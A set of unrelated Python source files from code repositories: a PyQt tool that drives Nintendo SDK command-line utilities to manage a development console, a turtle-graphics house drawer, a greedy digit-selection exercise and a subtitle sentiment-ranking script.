Please sit tight.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''Restart console'''\n def reboot(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to Reboot\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe reset')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Reboot Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Rebooting console... Please sit tight.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''***************** Help Menu Functions' Declaration *****************'''\n '''Developed by'''\n def about(self):\n self.sms_box = QtWidgets.QMessageBox()\n pixmap = QPixmap(r'C:\\Users\\dchitale\\Desktop\\download.png')\n self.sms_box.setWindowTitle(\"About Information \")\n self.sms_box.isSizeGripEnabled()\n self.sms_box.setText(\"This app is developed by Datta\")\n self.sms_box.setInformativeText(\"Switch Interface v1.0
    All rights reserved © 2021\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n\n def home_url(self):\n QDesktopServices.openUrl(QtCore.QUrl('https://world.ubisoft.org/job/quality_control/nzone/nzone.html'))\n\n def training_doc_explorer(self):\n os.startfile(r'\\\\ubisoft.org\\punstudio\\QC\\Public\\Platform New\\Console Docs\\NINTENDO NX\\Switch_Training')\n\n def ndi_doc(self):\n QDesktopServices.openUrl(QtCore.QUrl('file:///D:/NintendoSDK/NintendoSDK_10_4_0/NintendoSDK/Documents/Package/contents/title.html'))\n\n\n '''***************** First tab \"Media and attachment\" class *****************'''\nclass Tab_Media(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n #Create Screenshot groupbox\n self.Media_screenshot_grp_box = QtWidgets.QGroupBox(\"Screenshot Section\")\n self.Media_screenshot_grp_box.setMaximumHeight(70)\n #Create Copy groupbox\n self.Media_copy_grp_box = QtWidgets.QGroupBox(\"Copy Album Section\")\n self.Media_copy_grp_box.setMaximumHeight(70)\n #Create Delete groupbox\n self.Media_delete_grp_box = QtWidgets.QGroupBox(\"Delete Album Section\")\n self.Media_delete_grp_box.setMaximumHeight(70)\n\n '''*********************** create widgets for all three groupboxes ***********************'''\n #create and add widgets for Screenshot groupbox\n self.Screenshot_lable = QtWidgets.QLabel(\"Take a screenshot directly\")\n self.Screenshot_button = QtWidgets.QPushButton(\" Screenshot\")\n self.Screenshot_button.setStyleSheet('font:bold')\n self.Screenshot_button.setIcon(QIcon(\"screenshot.png\"))\n self.Screenshot_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_screenshot_grp_box = QtWidgets.QHBoxLayout()\n #self.V_screenshot_grp_box.setAlignment(QtCore.Qt.AlignCenter)\n self.V_screenshot_grp_box.addWidget(self.Screenshot_lable)\n self.V_screenshot_grp_box.addWidget(self.Screenshot_button)\n # set screenshot_grp_box's layout\n self.Media_screenshot_grp_box.setLayout(self.V_screenshot_grp_box)\n\n #create and add widgets for Copy groupbox\n self.Copy_lable = QtWidgets.QLabel(\"Copy all attachments from console to PC\")\n self.Copy_button = QtWidgets.QPushButton(\" Copy Album\")\n self.Copy_button.setStyleSheet('font:bold')\n self.Copy_button.setIcon(QIcon(\"copy.png\"))\n self.Copy_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_copy_grp_box = QtWidgets.QHBoxLayout()\n self.V_copy_grp_box.addWidget(self.Copy_lable)\n self.V_copy_grp_box.addWidget(self.Copy_button)\n # set Copy_grp_box's layout\n self.Media_copy_grp_box.setLayout(self.V_copy_grp_box)\n\n # create and add widgets for Delete groupbox\n self.Delete_lable = QtWidgets.QLabel(\"Delete all attachments from console album\")\n self.Delete_button = QtWidgets.QPushButton(\"Delete Album\")\n self.Delete_button.setStyleSheet('font:bold')\n self.Delete_button.setIcon(QIcon(\"trash.png\"))\n self.Delete_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_delete_grp_box = QtWidgets.QHBoxLayout()\n self.V_delete_grp_box.addWidget(self.Delete_lable)\n self.V_delete_grp_box.addWidget(self.Delete_button)\n # set Copy_grp_box's layout\n self.Media_delete_grp_box.setLayout(self.V_delete_grp_box)\n '''*********************** creating done here ***********************'''\n\n '''*********************** add all above to main layout ***********************'''\n self.Main_layout = QtWidgets.QVBoxLayout()\n #self.Main_layout.setAlignment(QtCore.Qt.AlignTop)\n 
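# ---- Editor's sketch (assumption; the original builds each box by hand) ----
# The three "label + button inside a QGroupBox" sections above are identical
# except for their texts and icons, so a small factory would remove the
# repetition. All names below are illustrative, not from the source; the
# function relies on the module's existing QtWidgets / QIcon imports.
def make_action_group(title, label_text, button_text, icon_path, button_width=100):
    """Build a QGroupBox holding a description label and an action button."""
    box = QtWidgets.QGroupBox(title)
    box.setMaximumHeight(70)
    button = QtWidgets.QPushButton(button_text)
    button.setStyleSheet('font:bold')
    button.setIcon(QIcon(icon_path))
    button.setMaximumWidth(button_width)
    row = QtWidgets.QHBoxLayout()
    row.addWidget(QtWidgets.QLabel(label_text))
    row.addWidget(button)
    box.setLayout(row)
    return box, button
# Hypothetical usage: box, btn = make_action_group("Screenshot Section",
#     "Take a screenshot directly", " Screenshot", "screenshot.png")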
self.Main_layout.addWidget(self.Media_screenshot_grp_box)\n self.Main_layout.addWidget(self.Media_copy_grp_box)\n self.Main_layout.addWidget(self.Media_delete_grp_box)\n self.setLayout(self.Main_layout)\n\n\n #Connections\n self.Screenshot_button.clicked.connect(self.take_screenshot)\n self.Delete_button.clicked.connect(self.delete_all_attachments)\n self.Copy_button.clicked.connect(self.copy_all_attachments)\n\n '''***************** Button Connections' Functions Declaration *****************'''\n def take_screenshot(self):\n if not os.path.exists(r'D:\\Album'):\n os.makedirs(r'D:\\Album')\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe take-screenshot --directory=\"D:\\Album\"')\n os.startfile(r'D:\\Album')\n\n def delete_all_attachments(self):\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Confirmation \")\n self.sms_box.setText(\"Are you sure you want to delete all attachments from console?\")\n self.sms_box.setStandardButtons(self.sms_box.Yes | self.sms_box.No)\n self.sms_box.setIcon(self.sms_box.Warning)\n self.press = self.sms_box.exec_()\n if self.press == self.sms_box.Yes:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\RunOnTarget.exe --suppress-auto-kill D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\TargetTools\\NX-NXFP2-a64\\DevMenuCommand\\Release\\DevMenuCommand.nsp -- album clean --storage builtin')\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Delete information\")\n self.sms_box.setText(\"All the attachments have been deleted\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n else:\n self.sms_box.close()\n\n def copy_all_attachments(self):\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\RunOnTarget.exe --suppress-auto-kill D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\TargetTools\\NX-NXFP2-a64\\DevMenuCommand\\Release\\DevMenuCommand.nsp -- album download --storage builtin --directory D:\\Album')\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Download information\")\n self.sms_box.setText(\"Downloading Album completed.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.setStandardButtons(self.sms_box.Open)\n self.sms_box.exec_()\n os.startfile(r'D:\\Album')\n\n\n\n'''***************** Second tab \"Manage Applications\" class *****************'''\nclass Tab_Applications(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n #Create App's first groupbox\n self.App_first_grp_box = QtWidgets.QGroupBox(\"Application Launcher\")\n self.App_first_grp_box.setMaximumHeight(70)\n #Create App's second groupbox\n self.App_second_grp_box = QtWidgets.QGroupBox(\"Application Terminator\")\n self.App_second_grp_box.setMaximumHeight(70)\n #Create App's third groupbox\n self.App_third_grp_box = QtWidgets.QGroupBox(\"Application Uninstaller\")\n self.App_third_grp_box.setMaximumHeight(70)\n # Create App's 4th groupbox\n self.App_fourth_grp_box = QtWidgets.QGroupBox(\"Application Installer\")\n self.App_fourth_grp_box.setMaximumHeight(70)\n\n\n '''*********************** create widgets for all three groupboxes ***********************'''\n #create and add widgets for App's first groupbox\n self.Launch_lable = QtWidgets.QLabel(\"Launch an installed Application\")\n self.Launch_button = QtWidgets.QPushButton(\"Launch\")\n self.Launch_button.setIcon(QIcon(\"launch.png\"))\n 
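# ---- Editor's note (assumption about intent, not original behavior) ----
# In copy_all_attachments above, the "Downloading Album completed." dialog
# is shown immediately after subprocess.Popen returns, but Popen does not
# wait for RunOnTarget.exe to finish, so the message can appear before the
# album is actually copied. A safer sketch (names hypothetical):
#
#     proc = subprocess.Popen(copy_command)
#     if proc.wait() == 0:   # block until the transfer process exits
#         show_info("Downloading Album completed.")
#     else:
#         show_info("Album download failed; check the console connection.")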
self.Launch_button.setStyleSheet('font:bold')\n #self.Screenshot_button.setIcon(QIcon(\"screenshot.png\"))\n self.Launch_button.setMaximumWidth(83)\n # add above widgets to App's first_grp_box\n self.V1_App_first_grp_box = QtWidgets.QHBoxLayout()\n self.V1_App_first_grp_box.addWidget(self.Launch_lable)\n self.V1_App_first_grp_box.addWidget(self.Launch_button)\n # set App's first_grp_box's layout\n self.App_first_grp_box.setLayout(self.V1_App_first_grp_box)\n\n #create and add widgets for App's second groupbox\n self.Terminate_lable = QtWidgets.QLabel(\"Terminate the running Application only\")\n self.Terminate_button = QtWidgets.QPushButton(\"Terminate\")\n self.Terminate_button.setIcon(QIcon(\"terminate.png\"))\n self.Terminate_button.setStyleSheet('font:bold')\n #self.Terminate_button.setIcon(QIcon(\"copy.png\"))\n self.Terminate_button.setMaximumWidth(83)\n # add above widgets to App's second groupbox\n self.V_Terminate_grp_box = QtWidgets.QHBoxLayout()\n self.V_Terminate_grp_box.addWidget(self.Terminate_lable)\n self.V_Terminate_grp_box.addWidget(self.Terminate_button)\n # set App's second groupbox's layout\n self.App_second_grp_box.setLayout(self.V_Terminate_grp_box)\n\n # create and add widgets for App's third groupbox\n self.Uninstall_lable = QtWidgets.QLabel(\"Uninstall the selected Application\")\n self.Uninstall_button = QtWidgets.QPushButton(\"Uninstall\")\n self.Uninstall_button.setIcon(QIcon(\"uninstall.png\"))\n self.Uninstall_button.setStyleSheet('font:bold')\n #self.Uninstall_button.setIcon(QIcon(\"trash.png\"))\n self.Uninstall_button.setMaximumWidth(83)\n # add above widgets to App's third groupbox\n self.V_uninstall_grp_box = QtWidgets.QHBoxLayout()\n self.V_uninstall_grp_box.addWidget(self.Uninstall_lable)\n self.V_uninstall_grp_box.addWidget(self.Uninstall_button)\n # set App's third groupbox's layout\n self.App_third_grp_box.setLayout(self.V_uninstall_grp_box)\n\n\n # create and add widgets for App's fourth groupbox\n self.Install_lable = QtWidgets.QLabel(\"Install the selected Application\")\n self.Install_button = QtWidgets.QPushButton(\"Install\")\n self.Install_button.setIcon(QIcon(\"uninstall.png\"))\n self.Install_button.setStyleSheet('font:bold')\n # self.Uninstall_button.setIcon(QIcon(\"trash.png\"))\n self.Install_button.setMaximumWidth(83)\n # add above widgets to App's third groupbox\n self.V_Install_grp_box = QtWidgets.QHBoxLayout()\n self.V_Install_grp_box.addWidget(self.Install_lable)\n self.V_Install_grp_box.addWidget(self.Install_button)\n # set App's third groupbox's layout\n self.App_fourth_grp_box.setLayout(self.V_Install_grp_box)\n\n '''*********************** creating done here ***********************'''\n\n '''*********************** add all above to main layout ***********************'''\n self.Main_layout = QtWidgets.QVBoxLayout()\n #self.Main_layout.setAlignment(QtCore.Qt.AlignTop)\n self.Main_layout.addWidget(self.App_first_grp_box)\n self.Main_layout.addWidget(self.App_second_grp_box)\n self.Main_layout.addWidget(self.App_third_grp_box)\n self.Main_layout.addWidget(self.App_fourth_grp_box)\n self.setLayout(self.Main_layout)\n\n\n #Connections\n self.Launch_button.clicked.connect(self.launch_app)\n self.Terminate_button.clicked.connect(self.terminate_app)\n self.Uninstall_button.clicked.connect(self.uninstall_app)\n self.Install_button.clicked.connect(self.install_app)\n\n def launch_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n 
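# ---- Editor's aside (hedged; pattern observed across every handler) ----
# The check-alive / connect preamble that starts above and continues below
# opens each handler in this file. A hypothetical decorator could wrap it
# once; CONTROL_TARGET and show_connection_warning are assumptions, not
# names from the source.
#
# def requires_console(handler):
#     """Run the handler only when check-alive and connect both succeed."""
#     def wrapper(self, *args, **kwargs):
#         alive = subprocess.Popen([CONTROL_TARGET, 'check-alive', '--any'])
#         conn = subprocess.Popen([CONTROL_TARGET, 'connect'])
#         if alive.wait() != 0 or conn.wait() != 0:
#             show_connection_warning()  # hypothetical message-box helper
#             return
#         return handler(self, *args, **kwargs)
#     return wrapper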
Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to launch application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n else:\n res = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-application')\n cmd_result = res.decode(\"latin1\", 'ignore').split('\\n')\n result = []\n for i in range(2, len(cmd_result)-3):\n result.append(cmd_result[i])\n# if no applications are installed - list is empty\n if len(result) == 0:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"App Information\")\n self.sms_box.setText(\"There are no Games or Applications installed on the console!!!\")\n self.sms_box.setInformativeText(\"Please install a Game/Application first in order to launch it.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n#Else populate list to QinputDialog and launch selected applicaion\n else:\n self.input_dialogue = QtWidgets.QInputDialog()\n text, ok = self.input_dialogue.getItem(self, \"Application selection\",\"Select an application to launch:\", result, 0, False)\n if ok:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe launch-application '+text\n subprocess.Popen(comm)\n else:\n self.input_dialogue.close()\n\n #self.Launch_button.setEnabled(False)\n\n def terminate_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to terminate application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe terminate')\n self.Launch_button.setEnabled(True)\n\n def uninstall_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to uninstall application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n res = 
subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-application')\n cmd_result = res.decode(\"latin1\", 'ignore').split('\\n')\n result = []\n for i in range(2, len(cmd_result) - 3):\n if cmd_result [i] == '0x0100000000002065 1.0.0 DevMenu Application \\r':\n continue\n result.append(cmd_result[i])\n #print(result)\n# if the applications are not installed (exclude DevMenu - risk to uninstall it)- list is empty\n if len(result) == 0:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"App Information\")\n #self.sms_box.setStyleSheet('font:bold')\n self.sms_box.setText(\"No Games or Applications installed on the console!!!\")\n self.sms_box.setInformativeText(\"Please install a Game/Application on console first.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n#Else populate list to QinputDialog and launch selected applicaion\n else:\n self.input_dialogue = QtWidgets.QInputDialog()\n text, ok = self.input_dialogue.getItem(self, \"Application selection\", \"Select an application to uninstall:\",result, 0, False)\n if ok:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe uninstall-application ' + text\n subprocess.Popen(comm)\n else:\n self.input_dialogue.close()\n\n def install_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n File_name = QtWidgets.QFileDialog.getOpenFileName(self, 'Open nsp build file', r\"C:\\\\\", 'Nsp file(*.nsp)')\n\n #Exit = None\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe install-application ' + File_name[0]\n Installation_progress = subprocess.Popen(comm, stdout=subprocess.PIPE, universal_newlines=True)\n\n print(\"Datta\")\n while Installation_progress.poll() is None:\n print(\"datta\")\n #line = Installation_progress.stdout.readline()\n #print(line.strip())\n #if \"Exit\" in line:\n #Exit = True\n #till Installation_result.wait() ! 
= 0\n '''---------------- progress bar'''\n\n\n\n\n\n\n\n\napp = QtWidgets.QApplication(sys.argv)\ndialog = My_Main_Dialog('Switch Interface')\ndialog.show()\nsys.exit(app.exec_())\n\n","repo_name":"dattachitale/My-Portfolio","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":38915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4872560216","text":"import turtle as t\r\nfrom PIL import ImageGrab\r\n\r\n\r\ndef build_house(base_x = -500, base_y = -500, base_width = 100, base_height = 10, base_fill = \"#000000\", walls_width = 20, walls_height = 20, walls_fill = \"#000000\", door_fill = \"#b81f00\", roof_width = 0, roof_height = 0, roof_fill = \"#000000\"):\r\n \"\"\"\r\n base_x — X of the lower-left corner of the foundation\r\n base_y — Y of the lower-left corner of the foundation\r\n base_width — width of the foundation\r\n base_height — height of the foundation\r\n base_fill — fill color of the foundation\r\n walls_x - computed automatically\r\n walls_y - computed automatically\r\n walls_width - requested from the customer\r\n walls_height - requested from the customer\r\n walls_fill - requested from the customer\r\n roof_x - computed automatically\r\n roof_y - computed automatically\r\n roof_width - requested from the customer\r\n roof_height - requested from the customer\r\n roof_fill - requested from the customer\r\n door_x - computed automatically\r\n door_y - computed automatically\r\n door_width - standard (we may ask the customer in the future)\r\n door_height - standard (we may ask the customer in the future)\r\n door_fill - requested from the customer\r\n \r\n \"\"\"\r\n img = ImageGrab.grab()\r\n screen_width = img.size[0]\r\n screen_height = img.size[1]\r\n\r\n ts = t.getscreen()\r\n ts.screensize(screen_width, screen_height)\r\n\r\n t.speed(0)\r\n walls_x = base_x\r\n walls_y = base_y + base_height\r\n walls_width = base_width\r\n door_width = 75\r\n door_height = 100\r\n door_x = (walls_width - door_width) / 2 + base_x\r\n door_y = base_height + base_y \r\n roof_x = walls_x - (walls_width * 0.1)\r\n roof_y = walls_y + walls_height\r\n roof_width = walls_width * 1.2\r\n\r\n\r\n\r\n def build_base(base_x, base_y, base_width, base_height, base_fill):\r\n print(f\"The foundation team has arrived and is digging a foundation pit in {base_x} and {base_y}\")\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(base_x, base_y)\r\n t.pendown()\r\n t.fillcolor(base_fill)\r\n t.begin_fill()\r\n t.forward(base_width)\r\n t.left(90)\r\n t.forward(base_height)\r\n t.left(90)\r\n t.forward(base_width)\r\n t.left(90)\r\n t.forward(base_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n def build_walls(walls_x, walls_y, walls_width, walls_height, walls_fill):\r\n print(\"brigade walls come\")\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(walls_x, walls_y)\r\n t.pendown()\r\n t.fillcolor(walls_fill)\r\n t.begin_fill()\r\n t.forward(walls_width)\r\n t.left(90)\r\n t.forward(walls_height)\r\n t.left(90)\r\n t.forward(walls_width)\r\n t.left(90)\r\n t.forward(walls_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n def build_door(door_x, door_y, door_width, door_height, door_fill):\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(door_x, door_y)\r\n t.pendown()\r\n t.fillcolor(door_fill)\r\n t.begin_fill()\r\n t.forward(door_width)\r\n t.left(90)\r\n t.forward(door_height)\r\n t.left(90)\r\n t.forward(door_width) \r\n t.left(90)\r\n t.forward(door_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n\r\n def build_roof(roof_x, roof_y, roof_width, roof_height, roof_fill):\r\n 
print(\"brigade roof come\")\r\n print(walls_width / 2 + base_x, base_height + walls_height + roof_height + base_y)\r\n t.penup()\r\n t.goto(roof_x, roof_y)\r\n t.setheading(0)\r\n t.fillcolor(roof_fill)\r\n t.pendown()\r\n t.begin_fill() \r\n t.forward(roof_width)\r\n t.goto(walls_width / 2 + base_x, base_height + walls_height + roof_height + base_y)\r\n t.goto(roof_x, roof_y)\r\n t.end_fill()\r\n\r\n\r\n build_base(base_x, base_y, base_width, base_height, base_fill)\r\n build_walls(walls_x, walls_y, walls_width, walls_height, walls_fill)\r\n build_door(door_x, door_y, door_width, door_height, door_fill)\r\n build_roof(roof_x, roof_y, roof_width, roof_height, roof_fill) \r\n print(\"house construction completed\")\r\n\r\n\r\nbuild_house(base_x = -100, base_y = -40, base_width = 200, base_height = 10, base_fill = \"#993300\", walls_height = 160, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 100, roof_fill = \"#fba67f\")\r\nbuild_house(base_x = 150, base_y = -330, base_width = 300, base_height = 50, base_fill = \"#993300\", walls_height = 1700, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 160, roof_fill = \"yellow\")\r\nbuild_house(base_x = 400, base_y = -340, base_width = 200, base_height = 1, base_fill = \"#993300\", walls_height = 160, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 410, roof_fill = \"orange\") \r\nbuild_house(base_x = -350, base_y = -320, base_width = 300, base_height = 15, base_fill = \"#993300\", walls_height = 190, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 120, roof_fill = \"black\")\r\nbuild_house(base_x = -600, base_y = -320, base_width = 200, base_height = 5, base_fill = \"#993300\", walls_height = 360, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 110, roof_fill = \"red\")\r\nt.done()","repo_name":"userTOP04/knb","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72620369833","text":"# M = int(input())\r\n# prices = list(map(int, input().split()))\r\n\r\nM = 10\r\nprices = [4, 3, 10, 8, 5, 6, 3, 12, 4]\r\n\r\nM = 28\r\nprices = [7, 5, 6, 8, 5, 5, 6, 10, 7]\r\n\r\n# age = \"\"\r\n# for i in range(9, 0, -1):\r\n# if prices[i-1] <= M:\r\n# age += str(i)\r\n# M -= prices[i-1]\r\n\r\n# if not age:\r\n# print(0)\r\n# else:\r\n# age = ''.join(sorted(age, reverse=True))\r\n# print(age)\r\n\r\nminPrice = min(prices)\r\nmax_digit = M//min(prices)\r\n\r\nresult = \"\"\r\n\r\n# for i in reversed(range(len(prices))):\r\ni = len(prices) - 1\r\nwhile i >= 0:\r\n # print(i)\r\n if prices[i] <= M:\r\n newM = M - prices[i]\r\n # print(\" \",newM,minPrice,newM//minPrice)\r\n if newM//minPrice == max_digit - 1:\r\n result += str(i+1)\r\n max_digit = newM//minPrice\r\n M = newM\r\n i = len(prices) - 1\r\n else:\r\n i-= 1\r\n else:\r\n i-=1\r\n\r\nprint(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# M = 28\r\n# prices = [7, 5, 6, 8, 5, 5, 6, 10, 7]\r\n\r\n\r\n# age = \"\"\r\n# while M >= min(prices):\r\n# max_price = max([p for p in prices if p <= M])\r\n# age += str(prices.index(max_price) + 1)\r\n# M -= max_price\r\n\r\n# print(age)\r\n\r\n# digits = [(i+1, prices[i]) for i in range(9)]\r\n# digits.sort(key=lambda x: x[1], reverse=True)\r\n\r\n# max_number = \"\"\r\n# for digit, price in digits:\r\n# if price <= M:\r\n# max_number += str(digit) * (M // price)\r\n# M %= price\r\n\r\n# print(max_number if 
len(max_number) > 0 else \"0\")\r\n","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"birthday3.py","file_name":"birthday3.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30806360731","text":"import subtitle_visualization\r\nimport count_list_creator\r\nimport subtitles_parser\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport csv\r\n\r\n\r\ndef parse_subs(directory_path, new_directory_path):\r\n \"\"\"\r\n Parses all files in the given directory, and creates for every file a new csv file\r\n with the percent of every subtitle and its VADER rank.\r\n :param directory_path: input directory name\r\n :param new_directory_path: output directory name\r\n \"\"\"\r\n all_files = [f for f in listdir(directory_path) if isfile(join(directory_path, f))]\r\n\r\n for file_name in all_files:\r\n new_file_name = directory_path + \"/\" + file_name\r\n try:\r\n percent_lst, rank_lst = subtitles_parser.parse_sub_file(new_file_name)\r\n if percent_lst == -1:\r\n print(file_name + \" --- File opening failed\")\r\n continue\r\n else:\r\n # create a csv file that contains the percents and ranks for a single\r\n # subtitles file:\r\n with open(new_directory_path + \"/\" + file_name[:len(file_name) - 4] +\r\n \" Ranks.csv\", 'w', newline='') as rank_file:\r\n csv_writer = csv.writer(rank_file)\r\n csv_writer.writerow(percent_lst)\r\n csv_writer.writerow(rank_lst)\r\n print(file_name + \" file was created successfully\")\r\n except Exception:\r\n print(new_file_name + \" has made an error\")\r\n\r\n\r\ndef sum_peaks(mypath):\r\n \"\"\"\r\n After creating files with percents and ranks, this function iterates over all the\r\n files and for each movie it counts how many emotional peaks there are in each\r\n percentage of the movie. 
